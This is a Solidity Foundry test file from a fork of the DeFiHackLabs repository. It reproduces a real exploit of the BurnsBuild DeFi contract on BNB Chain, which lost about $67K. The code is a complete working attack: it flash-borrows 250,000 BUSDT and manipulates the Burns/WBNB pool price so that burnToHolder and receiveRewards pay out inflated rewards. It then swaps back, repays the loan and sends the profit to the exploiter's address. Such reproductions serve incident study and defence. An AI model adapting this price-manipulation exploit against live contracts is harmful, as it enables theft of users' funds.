forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBurnsDefi_exp.sol
175 lines (153 loc) · 6.39 KB
/
BurnsDefi_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$67K
// Attacker : https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339
// Attack Contract : https://bscscan.com/address/0xb5eebf73448e22ce6a556f848360057f6aadd4e7
// Vuln Contract : https://bscscan.com/address/0x4fb9657ac5d311dd54b37a75cfb873b127eb21fd
// Attack Tx : https://phalcon.blocksec.com/explorer/tx/bsc/0x1d0af3a963682748493f21bf9e955ce3a950bee5817401bf2486db7a0af104b4
// @Analysis
// https://twitter.com/pennysplayer/status/1754342573815238946
// https://medium.com/neptune-mutual/how-was-citadel-finance-exploited-a5f9acd0b408 (similar incident)
interface IBurnsBuild {
function burnToHolder(uint256 amount, address _invitation) external;
function receiveRewards(address to) external;
}
contract ContractTest is Test {
IERC20 private constant BUSDT =
IERC20(0x55d398326f99059fF775485246999027B3197955);
IERC20 private constant Burns =
IERC20(0x91f1d3C7ddB8d5E290e71f893baD45F16E8Bd7BA);
IWETH private constant WBNB =
IWETH(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
DVM private constant DSP = DVM(0xD5F05644EF5d0a36cA8C8B5177FfBd09eC63F92F);
Uni_Pair_V2 private constant BUSDT_WBNB =
Uni_Pair_V2(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE);
Uni_Pair_V2 private constant Burns_WBNB =
Uni_Pair_V2(0x928cd66dFA268C69a37Be93BF7759dc8Ee676Bf8);
Uni_Router_V2 private constant PancakeRouter =
Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
IBurnsBuild private constant BurnsBuild =
IBurnsBuild(0x4fb9657Ac5d311dD54B37A75cFB873b127Eb21FD);
// address private exploiter = makeAddr("exploiter");
address private constant exploiter =
0xC9FBCf3EB24385491f73BbF691b13A6f8Be7C339;
function setUp() public {
vm.createSelectFork("bsc", 35858189);
vm.label(address(BUSDT), "BUSDT");
vm.label(address(Burns), "Burns");
vm.label(address(WBNB), "WBNB");
vm.label(address(DSP), "DSP");
vm.label(address(BUSDT_WBNB), "BUSDT_WBNB");
vm.label(address(Burns_WBNB), "Burns_WBNB");
vm.label(address(PancakeRouter), "PancakeRouter");
vm.label(address(BurnsBuild), "BurnsBuild");
vm.label(exploiter, "Exploiter");
}
function testExploit() public {
deal(address(BUSDT), address(this), 0);
deal(address(this), 0);
emit log_named_decimal_uint(
"Exploiter BUSDT balance before attack",
BUSDT.balanceOf(exploiter),
BUSDT.decimals()
);
emit log_named_decimal_uint(
"Exploiter Burns balance before attack",
Burns.balanceOf(exploiter),
Burns.decimals()
);
// Borrow BUSDT
bytes memory data = abi.encodePacked(uint8(49));
DSP.flashLoan(250_000 * 1e18, 0, address(this), data);
emit log_named_decimal_uint(
"Exploiter BUSDT balance after attack",
BUSDT.balanceOf(exploiter),
BUSDT.decimals()
);
emit log_named_decimal_uint(
"Exploiter Burns balance after attack",
Burns.balanceOf(exploiter),
Burns.decimals()
);
}
function DSPFlashLoanCall(
address sender,
uint256 baseAmount,
uint256 quoteAmount,
bytes calldata data
) external {
BUSDTToBurns(baseAmount);
address[] memory path = new address[](2);
path[0] = address(Burns);
path[1] = address(WBNB);
uint256 amountOut1 = 50e18;
uint256 amountOut2 = address(Burns).balance - amountOut1;
uint256[] memory amounts = PancakeRouter.getAmountsIn(amountOut1, path);
// burnToHolder() use getAmountsOut() and Burns/WBNB pair for making calculations
BurnsBuild.burnToHolder(amounts[0], exploiter);
amounts = PancakeRouter.getAmountsIn(amountOut2, path);
BurnsBuild.burnToHolder(amounts[0], exploiter);
BurnsBuild.receiveRewards(address(this));
WBNB.deposit{value: address(this).balance}();
WBNBToBUSDT();
BurnsToBUSDT();
BUSDT.transfer(address(DSP), baseAmount);
BUSDT.transfer(exploiter, BUSDT.balanceOf(address(this)));
}
receive() external payable {}
function BUSDTToBurns(uint256 amount) private {
// Transfer borrowed BUSDT to BUSDT/WBNB pair and obtain WBNB to deposit to Burns/WBNB pair
BUSDT.transfer(address(BUSDT_WBNB), amount);
(uint112 reserveBUSDT, uint112 reserveWBNB, ) = BUSDT_WBNB
.getReserves();
uint256 amountWBNB = PancakeRouter.getAmountOut(
amount,
reserveBUSDT,
reserveWBNB
);
// Deposit WBNB to Burns/WBNB
BUSDT_WBNB.swap(0, amountWBNB, address(Burns_WBNB), "");
(uint112 reserveBurns, uint112 _reserveWBNB, ) = Burns_WBNB
.getReserves();
uint256 amountBurns = PancakeRouter.getAmountOut(
amountWBNB,
_reserveWBNB,
reserveBurns
);
// Swap deposited WBNB to Burns tokens
Burns_WBNB.swap(amountBurns, 0, address(this), "");
}
function WBNBToBUSDT() private {
uint256 amountWBNB = WBNB.balanceOf(address(this));
WBNB.transfer(address(BUSDT_WBNB), amountWBNB);
(uint112 reserveBUSDT, uint112 reserveWBNB, ) = BUSDT_WBNB
.getReserves();
uint256 amountBUSDT = PancakeRouter.getAmountOut(
amountWBNB,
reserveWBNB,
reserveBUSDT
);
BUSDT_WBNB.swap(amountBUSDT, 0, address(this), "");
}
function BurnsToBUSDT() private {
Burns.transfer(address(Burns_WBNB), Burns.balanceOf(address(this)));
(uint112 reserveBurns, uint112 reserveWBNB, ) = Burns_WBNB
.getReserves();
uint256 amountWBNB = PancakeRouter.getAmountOut(
Burns.balanceOf(address(Burns_WBNB)) - reserveBurns,
reserveBurns,
reserveWBNB
);
Burns_WBNB.swap(0, amountWBNB, address(BUSDT_WBNB), "");
(uint112 reserveBUSDT, uint112 _reserveWBNB, ) = BUSDT_WBNB
.getReserves();
uint256 amountBUSDT = PancakeRouter.getAmountOut(
amountWBNB,
_reserveWBNB,
reserveBUSDT
);
BUSDT_WBNB.swap(amountBUSDT, 0, address(this), "");
}
}